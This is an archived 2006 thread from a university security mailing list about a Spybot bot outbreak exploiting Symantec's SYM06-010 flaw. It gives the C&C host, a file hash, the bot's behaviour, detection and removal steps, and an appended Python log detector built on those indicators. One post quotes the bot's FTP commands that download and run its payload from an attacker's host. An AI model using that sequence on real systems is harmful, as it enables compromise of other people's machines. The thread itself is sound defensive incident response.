[unisog] More: Bot outbreak exploiting SYM06-010

H. Morrow Long morrow.long at yale.edu
Tue Nov 28 14:42:56 GMT 2006


I don't know if it only affects 'managed' versions (you can run SAV
Corporate Edition in an unmanaged fashion) but that would make sense if
the attack comes in via TCP port 2697, as I believe that port would only
be open on managed clients.

As to patches -- I believe you are correct --
Symantec's advice in last night's posting is to upgrade vulnerable  
versions to versions which are not "affected".

- H. Morrow Long, CISSP, CISM, CEH
   University Information Security Officer
   Director -- Information Security Office
   Yale University, ITS



On Nov 28, 2006, at 9:34 AM, Robin Stubbs wrote:

> Thanks so much for posting this, all of you who have shared info on
> this.
>
> Someone here told me that this defect only affects managed
> installations. Can someone verify that? I am concerned that Symantec
> does not state that, so I am wondering if that is true.
>
> Secondly, is it the case that there are no patches for this? So if
> someone has a vulnerable version they have to uninstall it and install
> a new version? I would really not want to rely on an antivirus product
> getting the upper hand when the virus is already getting onto the
> system.
>
> ----- Original Message -----
> From: "H. Morrow Long" <>
> Date: Tuesday, November 28, 2006 8:12 am
> Subject: Re: [unisog] More: Bot outbreak exploiting SYM06-010
> To: UNIversity Security Operations Group <unisog at lists.dshield.org>
>
>
>> Symantec sent out a bulletin to their Platinum
>> customers last night detailing that there was a
>> new version of the W32.Spybot worm exploiting
>> SYM06-010 and pointing them to the malware
>> description web page :
>>
>>   http://www.symantec.com/avcenter/security/Content/2006.05.25.html
>>
>> It says that signature files #61675 and later
>> will be available today (11/28) with the sig
>> of the new variant.
>>
>> - H. Morrow Long, CISSP, CISM, CEH
>>    University Information Security Officer
>>    Director -- Information Security Office
>>    Yale University, ITS
>>
>>
>>
>> On Nov 28, 2006, at 12:09 AM, Liu, David wrote:
>>
>>> Any idea if the malware info has been made public on the Symantec
>>> site?
>>>
>>> -----Original Message-----
>>> From: unisog-bounces at lists.dshield.org
>>> [mailto:unisog-bounces at lists.dshield.org] On Behalf Of Brian Eckman
>>> Sent: Monday, November 27, 2006 7:02 PM
>>> To: UNIversity Security Operations Group
>>> Subject: [unisog] More: Bot outbreak exploiting SYM06-010
>>>
>>> We had a number of hosts become infected with an IRC bot today that
>>> used www.flackware.info as the Command and Control. Here is
>>> information that I know so far:
>>>
>>> ===================
>>> Command and Control
>>> ===================
>>> . www.flackware.info:6667/tcp (the only apparent name/port used)
>>> . (auto)JOIN #text airforce
>>>
>>> =========
>>> File Info
>>> =========
>>> . MD5(w32svc.exe)= 44a48fb5813d79c9a733bc941a9a548f
>>> . w32svc.exe is 1.12 MB (1,182,208 bytes)  (MASSIVE for a bot!)
>>> . Symantec definitions 11/27/2006 rev.50 and later will detect it as
>>>   a Spybot variant
>>>
>>> =============
>>> How to Obtain
>>> =============
>>> The bot uses a built-in FTP server ("Reptile", a.k.a. "StnyFTPd") to
>>> spread. When it compromises a machine, it executes the following
>>> commands:
>>>
>>> echo open (ip address of attacker) (ftp server port) > i
>>> echo user 1 1 >> i
>>> echo get w32svc.exe >> i
>>> echo quit >> i
>>> ftp -As:i
>>> w32svc.exe
>>> exit
>>>
>>> ========
>>> When Run
>>> ========
>>> . Installs itself to %WINDIR%\w32svc.exe
>>> . Sets Windows File Protection to "Scan only at bootup"
>>> . Moves ftp.exe and tftp.exe to %WINDIR%\System32\Microsoft\backup.ftp
>>>   and backup.tftp
>>> . Drops a new ftp.exe and tftp.exe to %WINDIR%\System32\
>>> . Attempts to connect to the Command and Control server
>>> . Installs itself as a service in many places within the registry
>>>
>>> =================
>>> Infection Vectors
>>> =================
>>> . Almost certainly via SYM06-010
>>> . Almost certainly other Windows vulnerabilities (since patched)
>>>
>>> ==============================
>>> Detecting Infections - Network
>>> ==============================
>>> . Looking for DNS queries for www.flackware.info
>>> . Looking for network traffic to port 6667/tcp going to the IP
>>>   address for www.flackware.info
>>> . Looking for scanning (more than 3-4 destinations) on port 2967/tcp
>>>
>>> =======================================
>>> Identifying Infection - At the Computer
>>> =======================================
>>> . Look for %WINDIR%\w32svc.exe
>>> . Look for a Service called "Windows Network Firewall"
>>>
>>> =======
>>> Removal
>>> =======
>>> Symantec definitions 11/27/2006 rev.50 performed admirably on my
>>> test box. Assuming the host did not have any other malware loaded
>>> onto it after infection, updating the AV defs to that "rev" or later,
>>> scanning the hard drive, then rebooting when prompted should do the
>>> trick.
>>>
>>> Manual Removal: Set the "Windows Network Firewall" service to
>>> "Disabled", and reboot (you can't stop the service while it is
>>> running).
>>> Delete the w32svc.exe file, and preferably, remove the associated
>>> (dozens of) registry keys.
>>>
>>> Brian
>>>
>>> -- 
>>> Brian Eckman, Security Analyst
>>> University of Minnesota
>>> Office of Information Technology
>>> Security & Assurance
>>>
>>>
>>> _______________________________________________
>>> unisog mailing list
>>> unisog at lists.dshield.org
>>> https://lists.sans.org/mailman/listinfo/unisog
>>>
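The network indicators in Brian Eckman's post (DNS lookups for the C&C name, IRC traffic to it on 6667/tcp, and one host touching more than 3-4 destinations on 2967/tcp) applied to log lines, as an added example that is not code from the thread. The key=value log format, the sample lines and the C&C IP address (198.51.100.23) are assumptions; the post gives the host name and ports but no address.

```python
# Added example (not from the thread): apply the post's network indicators
# to constructed log lines. Assumed simplified log format:
#   dns  <time> client=<ip> query=<name>
#   flow <time> src=<ip> dst=<ip> dport=<port> proto=<tcp|udp>
from collections import defaultdict

C2_NAME = "www.flackware.info"  # C&C host name from the post
C2_PORT = 6667                  # C&C port from the post
C2_ADDR = "198.51.100.23"       # ASSUMED placeholder; the post gives no IP
SCAN_PORT = 2967                # SYM06-010 service port, from the post
SCAN_THRESHOLD = 4              # "more than 3-4 destinations" on 2967/tcp

def parse(line):
    """Split 'kind time k=v k=v ...' into a dict."""
    kind, time, *fields = line.split()
    rec = {"kind": kind, "time": time}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    return rec

def detect(lines):
    """Return {host_ip: sorted indicator names} for hosts matching any indicator."""
    hits = defaultdict(set)
    scan_targets = defaultdict(set)  # src -> distinct dst IPs hit on 2967/tcp
    for rec in map(parse, lines):
        if rec["kind"] == "dns" and rec["query"].lower().rstrip(".") == C2_NAME:
            hits[rec["client"]].add("dns-c2-lookup")
        elif rec["kind"] == "flow" and rec.get("proto") == "tcp":
            dport = int(rec["dport"])
            if dport == C2_PORT and rec["dst"] == C2_ADDR:
                hits[rec["src"]].add("irc-c2-connect")
            elif dport == SCAN_PORT:
                scan_targets[rec["src"]].add(rec["dst"])
    for src, dsts in scan_targets.items():
        if len(dsts) >= SCAN_THRESHOLD:  # a normal SAV client talks to one parent
            hits[src].add("scan-2967")
    return {host: sorted(names) for host, names in hits.items()}

# Constructed sample: 10.1.2.3 is infected; 10.1.2.4 is a normal managed
# client checking in with its single parent server on 2967/tcp.
SAMPLE_LOG = [
    "dns 18:55:01 client=10.1.2.3 query=www.flackware.info",
    "flow 18:55:02 src=10.1.2.3 dst=198.51.100.23 dport=6667 proto=tcp",
    "flow 18:56:00 src=10.1.2.4 dst=10.1.0.5 dport=2967 proto=tcp",
] + [f"flow 18:57:{i:02d} src=10.1.2.3 dst=10.1.9.{i} dport=2967 proto=tcp"
     for i in range(1, 7)]
```

Running `detect(SAMPLE_LOG)` flags only 10.1.2.3; the single 2967/tcp connection from 10.1.2.4 to its parent server stays below the scan threshold and is not reported.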
